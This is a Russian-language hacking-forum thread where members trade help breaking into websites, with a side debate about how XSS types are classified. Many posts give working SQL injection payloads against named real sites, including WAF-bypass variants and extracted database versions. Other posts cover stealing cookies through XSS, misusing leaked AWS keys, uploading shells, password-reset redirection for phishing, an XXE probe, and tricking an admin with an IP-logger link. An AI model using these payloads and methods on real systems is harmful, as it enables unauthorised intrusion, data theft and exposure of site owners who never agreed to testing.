17.05.2018, 15:03
holdik said:
↑ (https://antichat.live/posts/4210453/)
Имеется XSS на сайте, alert работает, абсолютно все скрипты срабатываются, фильтра нет, но document.cookie отдает пустое значение. Готов заплатить деньги за консультацию.


HttpOnly cookie

holdik
17.05.2018, 22:07
cat1vo said:
↑ (https://antichat.live/posts/4210464/)
HttpOnly cookie


Я это уже понял. Ничего сделать нельзя, куки не стащить?

Octavian
18.05.2018, 02:58
Он на 5 минуте путает пасивное XSS с активнои или все мануалы на руском по XSS неправельны?

Jerri
18.05.2018, 09:30
Octavian said:
↑ (https://antichat.live/posts/4210608/)
Он на 5 минуте путает пасивное XSS с активнои или все мануалы на руском по XSS неправельны?


Отраженная XSS, способ воздействия - активная, так как на самой странице после перехода по ссылке от пользователя не требуется каких либо действий.

Octavian
18.05.2018, 12:49
Отраженые XSS

разве они не пасивные? а активные это когда (stored)мол постояно активны, так описывают мануалы?

http://i.imgur.com/YjSdijB.jpg

Jerri
18.05.2018, 13:52
Octavian said:
↑ (https://antichat.live/posts/4210680/)
Отраженые XSS
разве они не пасивные? а активные это когда (stored)мол постояно активны, так описывают мануалы?
http://i.imgur.com/YjSdijB.jpg


Хранимая может быть пассивной, т.е. от пользователя требуется что-то сделать для выполнения внедренного кода. Отраженная может быть активной, если после перехода по ссылке, например, код выполнится без дополнительных действий пользователя.

Octavian
18.05.2018, 14:08
Jerri said:
↑ (https://antichat.live/posts/4210704/)
Хранимая может быть пассивной, т.е. от пользователя требуется что-то сделать для выполнения внедренного кода. Отраженная может быть активной, если после перехода по ссылке, например, код выполнится без дополнительных действий пользователя.


Просто переход по сылке уже деиствия, спасибо

Jerri
18.05.2018, 14:11
Octavian said:
↑ (https://antichat.live/posts/4210706/)
Просто переход по сылке уже деиствия, спасибо


Действия непосредственно с функционалом веб приложения.

Octavian
18.05.2018, 14:22
Jerri said:
↑ (https://antichat.live/posts/4210707/)
Действия непосредственно с функционалом веб приложения.


А примеры можно?

crlf
18.05.2018, 15:38
Octavian said:
↑ (https://antichat.live/posts/4210608/)
путает пасивное XSS с активнои


путает

Jerri
18.05.2018, 15:42
crlf said:
↑ (https://antichat.live/posts/4210732/)
путает


Т.е. я не прав был? Насколько память не изменяет читал на английском, кажется, материал, с такой классификацией, что я выше описал. Т.е. в пассивные там приписывались только те xss, где от пользователя требуется действие на самой странице.

crlf
18.05.2018, 15:51
Jerri said:
↑ (https://antichat.live/posts/4210734/)
Т.е. я не прав был? Насколько память не изменяет читал на английском, кажется, материал, с такой классификацией, что я выше описал.


Возможно, докладчик в видео говорит опираясь как раз таки на какой-то забугорный материал. Не возьмусь утверждать 100%-но, так как пруфов на руках нет. Но если исходить из вопроса заданного @Octavian (https://antichat.live/members/267561/), который ставит под сомнение чаcть рускоязычного материала по Cross Site Scripting, то докладчик в видео путает термины. Так как, на сколько мне известно, в какое-то время тема межсайтового выполнения сценариев в СНГ и на западе развивалась независимо, поэтому есть некая путанница в мануалах. Активная = Stored, пассивная = Reflected.

.Slip
18.05.2018, 16:30
Запутавшимся, советую почитать Владимира Кочеткова, https://habr.com/company/pt/blog/149152/

Желательно всю статью, но если по теме вопроса, то раздел "XSS бывает пассивной и активной". По сути, есть две категории, первая — место хранения payload'a (серверсайд/клиентсайд - stored/reflected), вторая — условия срабатывания (те самые активные и пассивные, требующие или нет определённого действия от пользователя). Stored != Активная, Reflected != Пассивная. На выходе имеем четыре вариации XSS атаки. (+ DOM based в хвосте, но всем плевать)

crlf
18.05.2018, 23:23
.Slip said:
↑ (https://antichat.live/posts/4210756/)
Запутавшимся, советую почитать Владимира Кочеткова,
https://habr.com/company/pt/blog/149152/
Желательно всю статью, но если по теме вопроса, то раздел "
XSS бывает пассивной и активной
". По сути, есть две категории, первая — место хранения payload'a (серверсайд/клиентсайд - stored/reflected), вторая — условия срабатывания (те самые активные и пассивные, требующие или нет определённого действия от пользователя). Stored != Активная, Reflected != Пассивная. На выходе имеем четыре вариации XSS атаки. (+ DOM based в хвосте, но всем плевать)


@Jerri (https://antichat.live/members/90760/) был прав Пост @.Slip (https://antichat.live/members/21506/) можно считать пруфом. А то что он первый за 8 лет это подкрепляет!

BabaDook
02.06.2018, 18:33
man474019 said:
↑ (https://antichat.live/posts/4214700/)
hi
https://www.turannews.info/comm/index.php?id=64817/**//*!50000UNION SELECT*//**/username,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users-- (https://www.turannews.info/comm/index.php?id=64817%2F**%2F%2F*!50000UNION%20SELECT *%2F%2F**%2Fusername%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2 C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16,17%20from%20 users--)
why doesn't show the result ?


boolean based blind??

adirasta
07.06.2018, 18:48
есть sql типа:

URL : https://site.ru/uuurs.aspx?ctl00$menubartop$txtSearch=&ctl00$menubartop$btnsearch=%u0916%u094b%u091c (https://www.iob.in/ATM.aspx?ctl00%24menubartop%24txtSearch=&ctl00%24menubartop%24btnsearch=%25u0916%25u094b%25 u091c)

Parameter Name : ctl00%24ContentPlaceHolder1%24txt_uuursName

Parameter Type : POST

Attack Pattern : %27AND+1%3dcast(0x5f21403264696c656d6d61+as+varcha r(8000))+or+%271%27%3d%27

что делать? через софт запросы типа SELECT db_name() отвечает

http://s8.uploads.ru/t/pEadZ.png (http://uploads.ru/pEadZ.png)

http://vfl.ru/fotos/daf179b322033497.html

Sensoft
07.06.2018, 20:01
adirasta said:
↑ (https://antichat.live/posts/4216173/)
есть sql типа:
URL :
https://site.ru/uuurs.aspx?ctl00$menubartop$txtSearch=&ctl00$menubartop$btnsearch=%u0916%u094b%u091c (https://www.iob.in/ATM.aspx?ctl00%24menubartop%24txtSearch=&ctl00%24menubartop%24btnsearch=%25u0916%25u094b%25 u091c)
Parameter Name : ctl00%24ContentPlaceHolder1%24txt_uuursName
Parameter Type : POST
Attack Pattern : %27AND+1%3dcast(0x5f21403264696c656d6d61+as+varcha r(8000))+or+%271%27%3d%27
что делать? через софт запросы типа SELECT db_name() отвечает
http://s8.uploads.ru/t/pEadZ.png (http://uploads.ru/pEadZ.png)
http://vfl.ru/fotos/daf179b322033497.html


правой кнопкой нижимаешь и копируешь запрос для sqlmap

ShpillyWilly
08.06.2018, 14:05
товарищи, подскажите как залиться. Есть сайт, можно заливать все, кроме .php и .js. Все кроме этого превращается в файлы вида 5b19a3b042627.shtm или 5b19a6bc64a3f.php4 имя формирует сайт, причем даже если я заливаю .htaccess то зальется 5b19a6bc65a3f.htaccess. Имена файлов после заливки известны. После заливки .php и .js возвращается ошибка и битый урл типа site.ru/files/up/news/Array. SSI не работает(видать выключен), .phtml и .php2-5 не исполняются, .htaccess переименовывается после заливки. Есть еще доступ к редактированию некоторых страниц на сайте через tinymce. подскажите куда еще можно копнуть, спасибо.

Тот_самый_Щуп
09.06.2018, 02:38
Друзья, подскажите в каком направлении копать. Тестирую сайт на уязвимости, всё что удалось из него выжать, это конфиги от амазоновских инстансов:

define("S3_REGION",'***');

define("S3_KEY",'***');

define("S3_SECRET",'***');

define("S3_BUCKET",'***');

И аналогичный конфиг есть под амазоновскую базу, хост, логин, пароль, на хосте все порты закрыты, база извне не доступна, но и шелла на сайте у меня нет, только эти конфиги.

Я не силен в тонкостях работы с амазоновскими инстансами, если есть эксперты, будьте добры, подскажите, что я могу сделать с этими данными. Как желаемый максимум, попасть в базу данных, но повторюсь, физического доступа к тестируему сайту у меня нет.

PS: пароли от конфигов вбивались куда только можно под разными вариациями, SSH,FTP,Mail админка, и так далее, всё пока бесполезно.

crlf
09.06.2018, 03:21
Попробуй чекнуть https://github.com/s3fs-fuse/s3fs-fuse

Тот_самый_Щуп
09.06.2018, 03:23
crlf said:
↑ (https://antichat.live/posts/4216575/)
Попробуй чекнуть
https://github.com/s3fs-fuse/s3fs-fuse


Благодарю, попробую.

crlf
09.06.2018, 03:30
Советую ещё потыкать прикольный гайд http://flaws.cloud/ для расширения кругозора.

crlf
09.06.2018, 22:12
К сожалению, я могу лишь высказать предположение, так как не эксперт по AWS и не сталкивался с подобным случаем.

По идее копироваться ничего не должно, тулза предназначена для монтирования удалённого хранилища. А по файлам, возможно, стоит глянуть в сторону AWS KMS и разобраться как оно работает, но это не точно

kacergei
13.06.2018, 21:43
Добрый подскажите касательно sql-inj:

Хост/имя юзверя/название БД/Таблиц/Колонок - вытаскивается отлично (Как и в sqlmap|jSQL|так и ручками, через тот же Extractvalue)

Но не дает вытянуть данные:

Например при таком запросе (jSQL):


Code:
site.ru/maps.php?gorod=%c2%e8%ed%ed%e8%f6%e0'or(select+1+f rom(select+count(*),concat(((select+concat(0x53714 c69,mid((select+concat(group_concat(0x04,r,0x05,q, 0x04+order+by+r+separator+0x06),0x01030307)from(se lect+cast(concat(trim(ifnull(`add_group_id`,0x00)) ,0x7f,trim(ifnull(`email`,0x00)),0x7f,trim(ifnull( `group_id`,0x00)),0x7f,trim(ifnull(`id`,0x00)),0x7 f,trim(ifnull(`is_provider_id`,0x00)),0x7f,trim(if null(`login`,0x00)),0x7f,trim(ifnull(`name`,0x00)) ,0x7f,trim(ifnull(`pass_code`,0x00)),0x7f,trim(ifn ull(`phone`,0x00)))as+char)r,cast(count(*)as+char) q+from`uzver_frontenda`.`MS_user_shop`group+by+r+l imit+0,65536)x),1,64)))),floor(rand(0)*2))from+inf ormation_schema.tables+group+by+2)x)or'--+

В ответ:


Code:
Error occured, script stoped
Error type: Parser Error Source, line: Parser[359] Error: Wrong prefix in table name!
Error information:
Use key {DBNICK} to set prefix key for table: MS_user_shop

Доп данные:

CMS: Melbis Shop

Web: PHP 5.3.3, Apache 2.2.22

Mysql: 5.1.73-log

Is DBA: False

Octavian
17.06.2018, 17:57
Что за дич нашел бурп как раскрутить? кто может помоч?


Issue detail
The
username
parameter appears to be vulnerable to SQL injection attacks. The payload
'||(select extractvalue(xmltype('%tuxjp;]>'),'/l') from dual)||'
was submitted in the username parameter. This payload injects a SQL sub-query that calls Oracle's xmltype function to evaluate some data as XML. The supplied XML defines an external entity that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.


Изучил https://exploitstube.com/sql-injection-abusing-xxe-in-oracle.html

Помогите вектор наити а то на снифере приходи пустота, скину прив

Sensoft
24.06.2018, 03:13
Можно что нить достать через эти ошибки ?


Code:
Warning: preg_match() expects parameter 2 to be string, array given in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/kernel/kernel.php on line 65
Warning: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/classes/Session.php on line 199
Warning: strlen() expects parameter 1 to be string, array given in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/modules/lostpass/ajax.php on line 16
{"error":10,"error_msg":"\u0412\u0432\u0435\u0434\u0438\u0442\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u 044b\u0439 \u043a\u043e\u0434 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u 0434\u0435\u043d\u0438\u044f"}



Code:
Attack details
Cookie input QSID was set to T3JqNVNBclMwQVFlaUlLaXJwV1E3eVp5N3k=
Error message found:
Warning: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /data/storage/hosting/www/users/a6939/sites/САЙТ/www/classes/Session.php on line 199

Тот_самый_Щуп
25.06.2018, 01:46
Sensoft (https://antichat.live/members/266110/), кроме раскрытия путей ничего не достанете.

caesarhunter
06.07.2018, 00:46
https://www.europecoin.eu.org/planetcrypto/tags?ordering=postcount&sorting=desc&start=18'

мап не крутит, вручную выдает ошибку 500

с этим что-то можно сделать?

cat1vo
06.07.2018, 16:51
caesarhunter said:
↑ (https://antichat.live/posts/4224322/)
https://www.europecoin.eu.org/planetcrypto/tags?ordering=postcount&sorting=desc&start=18
'
мап не крутит, вручную выдает ошибку 500
с этим что-то можно сделать?


Иньекция в limit, в запросе есть order by через union не выйдет. Можете через ошибку получить текущего пользователя, версию БД и название базы данных, стоит патч подзапросы не будут работать. Ну и есть не опасный waf, учтите это!


Code:
start=18 procedure analyse(extractvalue(0x0a,concat(0x0a,version())), 1)-- -

XPATH syntax error: ' 5.5.60-0ubuntu0.14.04.1'

Sensoft
09.07.2018, 03:17
Есть смысл крутить ? или это даже не SQL injection ?

https://s8.hostingkartinok.com/uploads/images/2018/07/f0372ee8a074289f6b9b001c23d93184.png

Octavian
09.07.2018, 11:18
Sensoft said:
↑ (https://antichat.live/posts/4225208/)
Есть смысл крутить ? или это даже не SQL injection ?
https://s8.hostingkartinok.com/uploads/images/2018/07/f0372ee8a074289f6b9b001c23d93184.png


Если ругается на \ это инекцыя, если addslashes() крутется так \` OR 1=1 --, может быть фрагментированая инекция

Sensoft
10.07.2018, 03:25
Nessus показывает тут www.bitxoxo.exchange (http://www.bitxoxo.exchange) TLS Version 1.0 Protocol Detection

Но почему я эксплоитом heartbleed не могу пробить ?

Или nessus напиздел ?

sepo
10.07.2018, 19:46
Sensoft said:
↑ (https://antichat.live/posts/4225476/)
Nessus показывает тут
www.bitxoxo.exchange (http://www.bitxoxo.exchange)
TLS Version 1.0 Protocol Detection

Но почему я эксплоитом heartbleed не могу пробить ?
Или nessus напиздел ?


Вероятно False-Positive...

Octavian
11.07.2018, 14:48
А вообще есть сервисы в которых вводишь фильтруемые слова а он генерирует возможные вектора XSS?

sepo
12.07.2018, 23:30
Octavian said:
↑ (https://antichat.live/posts/4226005/)
А вообще есть сервисы в которых вводишь фильтруемые слова а он генерирует возможные вектора XSS?


а не легче написать скрипт который это будет делать?

sepo
12.07.2018, 23:53
BabaDook said:
↑ (https://antichat.live/posts/4226441/)
Такое нельзя сделать


Почемууу??

Sensoft
15.07.2018, 20:23
Vulnerabilities in SharePoint could allow elevation of privilege

Есть эксплоит ? и можно как то подключится и получить shell код на системе с этой дыйрой ?

Везде пишется тип права повышать, а какой толк только.

dmax0fw
19.07.2018, 22:41
Octavian said:
↑ (https://antichat.live/posts/4228383/)
Это массив или обиект


это джейсон но не стетхем

сериализованных данных в нём нет, если ты об этом

Jerri
19.07.2018, 22:45
Octavian said:
↑ (https://antichat.live/posts/4228383/)
В пост запросе плавает

Code:
data={"14":null,"cv_id":"71f28a90c3a54920b9c1b12fae2f7a97+","group_id":"photo"}

Это массив или обиект и какие атаки можно попробовать?


Плавает и плавает, обычный JSON в POST-запросе.

Lector
20.07.2018, 12:05
Уязвимость найдена через форму поиска, параметр ' подскажите как раскрутить


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '%'' at line 1 : SELECT COUNT(*) FROM
`mstr_manageproduct` AS A INNER JOIN `mstr_products` AS B ON A.`product_id`=B.product_id
INNER JOIN `mstr_saller` AS C ON A.`saller_id`=C.saller_id WHERE 1=1 AND A.status='Active' AND
B.`product_name` like '%'%'

Octavian
20.07.2018, 21:19
Есть возможность узнать ip администратора сайта на wordpress?

iGermi
21.07.2018, 16:38
Здраствуйте, форум. Интересует возможность подключения сторонней JS библиотеки используя html тег . Кто подскажет.

Или любой другой способ использовать js на сайте forum.minecraft-galaxy.ru

iGermi
21.07.2018, 16:41
Octavian said:
↑ (https://antichat.live/posts/4228823/)
Есть возможность узнать ip администратора сайта на wordpress?


Подкинуть ему ссылку на почту с айпи логером

Octavian
21.07.2018, 23:28
Привет а как большой js засовывать, когда невозможно за тега а выйти?


Code:
finiio

dmax0fw
22.07.2018, 00:13
Octavian said:
↑ (https://antichat.live/posts/4229263/)
Привет а как большой js засовывать, когда невозможно за тега а выйти?

Code:
finiio



подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом

Octavian
22.07.2018, 00:15
dmax0fw said:
↑ (https://antichat.live/posts/4229272/)
подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом


можно пример

dmax0fw
22.07.2018, 00:18
Octavian said:
↑ (https://antichat.live/posts/4229275/)
можно пример


буквально сегодня в соседней теме отвечал человеку с похожим вопросом

/threads/464058/ (https://antichat.live/threads/464058/)

Zyaba
24.07.2018, 18:35
Muracha said:
↑ (https://antichat.live/posts/4187178/)
Попробуй залить шелл через плохую обработку mine-type используя tor+live http clone
Уязвимости типа "некорректной обработки данных при загрузке файлов пользователей".
Самая изощренная уязвимость но и самая интересная. Да да, это вам не скули крутить


Можно подробнее? гугление ничего толком не дает.

Есть усечение пути (с кучей /./.) - но это не то, как я понимаю.

DezMond™
25.07.2018, 21:20
Помогите ваф обойти


Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union +select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35+--+

DezMond™
26.07.2018, 09:39
BabaDook said:
↑ (https://antichat.live/posts/4230482/)

PHP:
reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+f alse+union distinct select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35+--+



From фильтруется, помогите обойти)

grelly
26.07.2018, 17:46
Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url http://shoebrand.co.uk/index.php?route=product/category&path=64&limit=32 с использованием тампера between возвращает ошибку:

[WARNING] HTTP error codes detected during run:

403 (Forbidden) - 1 times.

Найденные уязвимости:

Parameter: path (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: route=product/category&path=64 AND 9469=9469&limit=32

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: route=product/category&path=64 AND SLEEP(10)&limit=32

Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?

panic.ker
26.07.2018, 18:15
2 BabaDook

Вероятнее всего потому, что в мануалах по дефолту так написано.

2 grelly

modsecurityversioned и modsecurityzeroversioned -тамперы под mod_security

cat1vo
26.07.2018, 18:18
grelly said:
↑ (https://antichat.live/posts/4230678/)
Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url
http://shoebrand.co.uk/index.php?route=product/category&path=64&limit=32
с использованием тампера between возвращает ошибку:
[WARNING] HTTP error codes detected during run:

403 (Forbidden) - 1 times.
Найденные уязвимости:
Parameter: path (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: route=product/category&path=64 AND 9469=9469&limit=32

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: route=product/category&path=64 AND SLEEP(10)&limit=32

Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?




Code:
path=64 group by elt(rand(0)|0,version()) having avg(0)-- -
Duplicate entry '5.6.39-83.1' for key 'group_key

Почитайте больше про SQL инъекции, в особенности, про вывод в ошибке! А не про то как пользоваться sqlmap.

joelblack
26.07.2018, 18:19
Там и с Union особых проблем нет


Code:
http://shoebrand.co.uk/index.php?route=product/category&path=64+AND+FALSe+/*!50000UniON*//*!50000SeLeCT*/1,version(),3+--+-&limit=32

DezMond™
28.07.2018, 16:12
Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1

Можно что нить сделать?

joelblack
28.07.2018, 19:15
Маловероятно. На сайте присутствуют и другие уязвимости,можно попробовать посмотреть что то еще:


Code:
http://www.quattrobi.it/it/no_cache/prodotti/famiglia/?family[id]=98&marcatura=">alert(document.domain)

BigBear
29.07.2018, 20:05
DezMond™ said:
↑ (https://antichat.live/posts/4230455/)
Помогите ваф обойти

Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union +select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35+--+



#1


Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1 =2+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,@@version,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,(35)from+dual+--+

#2


Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1 =if((select(1)from+dual)=1,1,2)+--+



DezMond™ said:
↑ (https://antichat.live/posts/4231356/)

Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1

Можно что нить сделать?




Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1

Прочтите текст ошибки

BigBear
30.07.2018, 22:36
Jerri said:
↑ (https://antichat.live/posts/4210704/)
Хранимая может быть пассивной, т.е. от пользователя требуется что-то сделать для выполнения внедренного кода. Отраженная может быть активной, если после перехода по ссылке, например, код выполнится без дополнительных действий пользователя.


Пускай поздно, но промолчать не могу.

Для вас и других, кто прочтёт сообщение.

XSS разделяют на:

Stored или Persistent - хранимые (в простонародье активные)

Reflected - отраженные (... пассивные)

DOM-Based

Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям

То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction

Sensoft
30.07.2018, 22:48
BigBear said:
↑ (https://antichat.live/posts/4232102/)
Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction


Допустим есть биржа, где есть баланс и вся ***ня, и там есть XSS (пример прикрепил)

Так вот что можно сделать ?

.SpoilerTarget" type="button">Spoiler: Скрин
https://3.bp.blogspot.com/-Edf439w6qNU/WacFnHr-a_I/AAAAAAAAFj4/AN2fuhTbYz4dmxnaoxwMWocypNuuaE6BgCLcBGAs/s1600/XSS1.png

DezMond™
31.07.2018, 13:21
BigBear said:
↑ (https://antichat.live/posts/4231803/)

Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1

Прочтите текст ошибки


я понимаю что колонка id не найдена, просто думал есть какие то варики с выводом в ошибке.

Octavian
01.08.2018, 22:48
Почему Бурп не отображает содержимое GraphQL запросов?

Чем перехватывать и тестировать?

joelblack
01.08.2018, 23:10
https://blog.doyensec.com/2018/05/17/graphql-security-overview.html

https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/

Octavian
06.08.2018, 19:27
При сбросе пароля


Code:
host=ataker.ru&mail=asd@mail.ru

На почте приходит


Code:
https://site.com/forgot/ataker.ru/973bb5606f94bbaa2509c25977f257f1ce203ea1

После смены пароля редиректит на ataker.ru

Как идея я могу на ataker.ru словить Referer тем самым добыть ссылку восстановления пароля

Есть другие идеи эксплуатации?

----------------------------

PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?

crlf
06.08.2018, 22:39
Octavian said:
↑ (https://antichat.live/posts/4234498/)
После смены пароля редиректит на ataker.ru


Скорее всего, токен, после сброса пароля, станет невалидным, по крайней мере, так оно должно работать


Octavian said:
↑ (https://antichat.live/posts/4234498/)
Есть другие идеи эксплуатации?


Если редиректит незаметно, без ворнингов, то фишинг вполне может пройти.


Octavian said:
↑ (https://antichat.live/posts/4234498/)
PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?


Этот момент не совсем ясен, нужно подробное описание или скриншоты. В качестве теста, можно попробовать заслать какой-нибудь простенький пейлод типа:


Code:

]>
&xxe;

И чекнуть резолв или реквест своего хоста в логах.

Octavian
12.08.2018, 23:12
BigBear said:
↑ (https://antichat.live/posts/4232102/)
Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction


Так он на 5-5:35 не прав что называет Reflect XSS активной?

Или он не правильно высказался что при Reflect XSS = отраженая с точке зрения воздействия это активная поскольку нужно деиствия от юзера, а Stored XSS = хранимая с точке зрения воздействия это пасивная поскольку не нужно деиствия от юзера?

panic.ker
13.08.2018, 22:13
Жабу скинь. А вообще октавиан, "миллион" (необоснованная мной цифра) писали про это. Оваспы, разорчик подкидывает,бум оч хорошо пишет. Споров много, НО ВСЕ ЗАВИСИТ от вектора. Вот давай я щас дупля отобью, линков тебе накидаю чтоли. Ибо я не совсем трезв, к сожалению. Большой медведь верно говорит все

Octavian
14.08.2018, 14:24
Как защитится от Pixel Flood? Просто в вебе

cat1vo
24.08.2018, 07:03
[QUOTE="o314um"]
o314um said:
↑ (https://antichat.live/posts/4239344/)
Есть одна интересная sql-inj.
Линк засветить не могу, но постараюсь дать максимально подробное описание.
немного условностей
№1 - обычный вывод информации на страницу
№2 - страница отображается, но без данных (не пустая страница)
№3 - пустая страница - скорее всего ситнтакксическая ошибка mysql (сам эррор не отображается)
[CODE]
Code:
id=62-1

DezMond™
26.08.2018, 13:02
Code:
http://www.top50-solar.de/index.php?eID=tx_top50directory_pi2&L=1&tx_top50directory_pi2%5Bajaxcontroller%5D=searchzi porcity&tx_top50directory_pi2%5Bcountrycode%5D=DEU%22)+ord er+by+1+--+

Есть варик на вывод колонок? проблема в том, что когда 1 колонка(по order by) ошибка страницы... по тайм байс перебор не берёт(

vikler
26.08.2018, 16:56
Кто-нибудь обходил incapsula WAF при скуле?

Есть mssql injection внутри convert(int,query)

при введении @@version в параметр получаем версию mssql

При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403

в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula.

Есть у кого опыт? есть хоть какой рабочий вектор?

Sensoft
26.08.2018, 17:52
vikler said:
↑ (https://antichat.live/posts/4239980/)
Кто-нибудь обходил incapsula WAF при скуле?
Есть mssql injection внутри convert(int,query)
при введении @@version в параметр получаем версию mssql
При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403
в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula.
Есть у кого опыт? есть хоть какой рабочий вектор?


https://github.com/sqlmapproject/sqlmap/blob/master/waf/incapsula.py

*** знает поможет или нет

отпишись если поможет

vikler
26.08.2018, 18:34
это же просто detect WAF'a. Чем тут поможет обойти?

Sensoft
26.08.2018, 18:44
vikler said:
↑ (https://antichat.live/posts/4239994/)
это же просто detect WAF'a. Чем тут поможет обойти?


это разве не тампер ?

бля рили детект я нашёл думал тампер )

ггг сорян

kacergei
26.08.2018, 21:31
Подскажите как раскручивать sql-inj в таких ситуациях:

1) cPanel глушит почти что всё в 403-ию ошибку (HTTP Error 403 - Forbidden)

metroeyesng.com/?/product/online_store/&prd_id=11 (Параметр prd_id)

2) Есть ли в настоящий момент "действующие" tamper'ы sqlmap'a для обхода CloudFlare? (PS: выяснять реальный ip не подходит)

Или хотя бы рабочий пример какой-нибудь(

joelblack
26.08.2018, 22:08
Code:
http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-



Code:
Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'

kacergei
27.08.2018, 06:10
joelblack said:
↑ (https://antichat.live/posts/4240028/)

Code:
http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-


Code:
Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'



А не подскажите как в таких ситуациях выводить БД/таблицы? А то пробовал и в hex загонять не выходит (толи руки не оттуда(( )

Тот_самый_Щуп
27.08.2018, 06:44
joelblack (https://antichat.live/members/267454/),в чем смысл давать вектор с name_const? Тем более новичку.

Octavian
28.08.2018, 16:29
Есть тут уязвимость?

https://i.imgur.com/feR7FRF.jpg

Тот_самый_Щуп
28.08.2018, 16:52
Лол, плайнтекстом никак?

И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.

kacergei
28.08.2018, 17:48
Gorbachev said:
↑ (https://antichat.live/posts/4240368/)
